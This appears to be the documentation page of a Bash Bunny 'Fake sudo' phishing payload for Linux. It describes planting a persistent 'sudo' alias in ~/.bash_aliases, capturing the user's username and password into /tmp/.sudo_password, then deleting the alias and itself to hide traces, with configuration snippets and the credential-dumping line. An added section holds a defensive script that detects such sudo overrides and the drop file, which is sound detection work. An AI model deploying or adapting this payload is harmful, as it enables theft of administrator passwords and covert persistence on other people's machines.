TW-D 80573a03ab
fake-sudo - Improvements and corrections (#528)
* Update README.md

* Update sudo-phishing.sh

* Update sudo-phishing.sh

* Delete payloads/library/phishing/fake-sudo directory

* Add files via upload
2022-05-29 16:21:12 -05:00

Fake sudo

  • Title: Fake sudo
  • Author: TW-D
  • Version: 1.1
  • Target: Linux
  • Category: Phishing

Description

  1. Copies the "sudo" command spoofing program to the user's home directory.
  2. Defines a new persistent "sudo" alias in the file "~/.bash_aliases".
  3. When a "sudoer" user executes the command "sudo" in a terminal, the spoofing program:
     • By default, retrieves the username and password and writes them to "/tmp/.sudo_password".
     • This behavior can be changed on line 26 of the "sudo-phishing.sh" file.
  4. The spoofing program deletes the "sudo" alias, then deletes itself.
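
For defenders, a check for the persistence described above, as an added example that is not part of the payload or its repository: it scans bash startup files for a "sudo" alias or function and looks for the default output file. The function names and the startup files other than "~/.bash_aliases" are assumptions.

```shell
#!/bin/sh
# Added defensive example (not from the payload repository).
# Flags bash startup files that redefine "sudo" as an alias or function.

# ERE: an alias definition naming sudo, or a shell function called sudo.
# Statements that sit behind a '#' comment marker are not matched.
SUDO_OVERRIDE_RE='^[[:space:]]*([^#]*[;&][[:space:]]*)?alias[[:space:]]+([^#]*[[:space:]])?sudo=|^[[:space:]]*(function[[:space:]]+sudo([[:space:](){]|$)|sudo[[:space:]]*\(\))'

# find_sudo_overrides FILE...
# Prints "file:line:text" for every match; unreadable files are skipped.
find_sudo_overrides() {
    for f in "$@"; do
        [ -r "$f" ] || continue
        # /dev/null as a second operand forces the "file:" prefix portably.
        grep -nE -- "$SUDO_OVERRIDE_RE" "$f" /dev/null || true
    done
    return 0
}

# drop_file_present PATH
# Succeeds when the payload's output file exists.
drop_file_present() {
    [ -e "$1" ]
}

# Assumed scan set: "~/.bash_aliases" is named on the page, the rest are
# common bash startup files.
home="${HOME:-/nonexistent}"
hits=$(find_sudo_overrides "$home/.bash_aliases" "$home/.bashrc" \
    "$home/.bash_profile" "$home/.profile")
if [ -n "$hits" ]; then
    printf 'Review these "sudo" overrides:\n%s\n' "$hits"
fi
if drop_file_present /tmp/.sudo_password; then
    printf 'Found /tmp/.sudo_password (default output path of this payload)\n'
fi
```

A hit is a prompt for review, not proof: the common benign alias `alias sudo='sudo '` is reported too. Because the spoofing program removes its alias and itself after use, a clean result does not rule out an earlier capture.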

Configuration

In "payload.txt", change the value of the following constant:


######## INITIALIZATION ########

readonly BB_LABEL="BashBunny"

In "sudo-phishing.sh", change the values of the following constants if necessary:


readonly MAXIMUM_ATTEMPTS=3
readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"

In "sudo-phishing.sh", change the payload if you wish:

##
# <YOUR-PAYLOAD>
##
/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
##
# </YOUR-PAYLOAD>
##